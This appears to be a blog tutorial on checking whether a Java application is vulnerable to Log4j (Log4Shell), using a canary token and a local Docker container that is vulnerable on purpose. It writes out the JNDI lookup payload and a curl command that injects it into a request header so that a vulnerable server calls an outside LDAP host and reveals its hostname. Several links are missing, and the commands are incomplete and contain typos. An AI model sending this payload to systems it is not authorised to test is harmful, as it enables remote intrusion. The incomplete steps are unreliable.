How to test for Log4j vulnerability in your Java app?

As you know Log4j vulnerability is a CVSS severity level 10 vulnerability and it allows attackers to receive inputs from another server or domain name using JNDI (Java Naming and Directory Interface). For the user to hack in just they need to type in a command like this – ${jndi:ldap://}. But there are ways to test it to see whether your apps or servers are affected by this vulnerability. Follow the below steps to test your app for vulnerability (The below example includes a sample Docker container which has this vulnerability)

Updates (Important links):

Steps to test your server for Log4j Vulnerability

Step 1: Go to

Step 2: Type your email address and place where you are going to use the token

Step 3: Once the token is created, you will see a image like this

Step 4: Some one has created a Docker container which includes the log4j vulnerability and execute the docker app in your local by the below command

docker run --name vulnerable-app -p 8080:8080

You can see more about it over here – (It has more detailed steps on how to execute it for a localhost)

Step 5: Once you run the docker container it will get started as shown below

Step 6: Now execute the canary token you just created in the Step 3 from another terminal as shown below

curl ServerName:Port -H "X-Api-ersion:${jndi:ldap://x${hostName}}"

Now the canary tokens comes with hostname also. This would enable you to test your internal applications also. This is because if the application is vulnerable the canaryt oken email notification also would display the hostname.Once you have run this command, it will trigger a request to canary tokens website as well as you can see the request being sent in the Docker container you are running.

Step 7: And you would also get an email notification from Canary Tokens as shown below (Token reminder is very important as it would let you know where it got triggered from. I just kept it with a wrong spelling Webistes so I know where it got triggered from )

By following the above steps you can check whether your Java app is vulnerable or not. All you need to do is create a canary token and send a curl command via terminal to see what happens!

Update 12/13 | 5PM UTC: CanaryTokes now


I am a  Technical Architect who dabbles with different languages and technologies

You may also like...